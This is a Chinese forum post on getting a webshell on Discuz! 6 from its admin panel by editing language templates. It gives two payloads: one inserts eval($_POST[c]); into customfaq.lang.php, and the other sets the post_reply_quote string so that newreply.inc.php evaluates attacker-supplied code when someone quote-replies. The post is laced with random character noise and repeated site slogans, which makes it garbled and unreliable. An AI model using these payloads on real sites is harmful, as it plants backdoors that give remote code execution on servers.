Discuz! 6 后台拿webshell的方法
如果后台可以在线编辑模板的话,下面的方法就可以拿webshell了:
9 |5 {& X2 k0 M P- B打造最好的电脑自学交流论坛1.后台编辑customfaq(customfaq.lang.php文件)
* z/ \4 R$ t1 k4 g% g# f在<?的后面加上www.520diannao.com) W+ Q K0 T l: h) |4 u) v
# Q0 ~9 E2 K. k5 S- G7 Y- ^% N. @4 Swww.520diannao.comQuote:
7 t, }# p4 ?4 `3 J电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站eval($_POST[c]);
9 L& Z" L* i& I1 Q; R: r4 [打造最好的电脑自学交流论坛
: X/ ^, w' l& X* \( Z6 Z5 b% B+ `! O电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站我爱电脑技术社区--打造最好的电脑技术自学交流平台" D- j9 i, c% T% P
2.后台编辑misc(misc.lang.php文件)
7 M6 z' ^: A$ V( `+ t我爱电脑技术论坛把post_reply_quote对应的内容改为
$ R6 H+ j6 C u0 W我爱电脑技术社区--打造最好的电脑技术自学交流平台
' D. |7 V* k0 F& f打造最好的电脑自学交流论坛Quote:打造最好的电脑自学交流论坛' ?7 Q( K2 w, _* C' z: o7 S/ A% y
";eval($_POST[c]);"
! E) N! H* V ~% n+ J8 N0 e
; }( C: G5 e% L4 `0 e: D& ewww.520diannao.com
1 \5 B+ w! ]5 Z; Y5 g+ D在前台回帖处选择引用回复。
7 t% R* [6 w+ U) P电脑,技术,IT,学习,交流,网络安全,QQ,硬件,软件,编程,教程,建站简单看下代码:: J, {* m% ?# ~. p) y" x
. z& L4 }: s( \& T我爱电脑技术社区--打造最好的电脑技术自学交流平台include/newreply.inc.php 107行:
3 d) j- I. A6 {我爱电脑技术论坛
4 l7 r: i& p, {. H: R3 A打造最好的电脑自学交流论坛Quote:
8 c* W- y( p% p! c6 H {" p; Aeval("\$language['post_reply_quote'] = \"$language[post_reply_quote]\";");打造最好的电脑自学交流论坛& c, j2 t4 B2 A/ N" B
打造最好的电脑自学交流论坛8 F3 {2 ^" A# W! ? c2 D: a
打造最好的电脑自学交流论坛4 R: i: L! A. m, F- S
呵呵,一个天然的后门:
$ f- Q+ ` w9 A7 M. ^, dwww.520diannao.comPS:还有几个编辑模板的地方可以利用,和第二种方法类似。
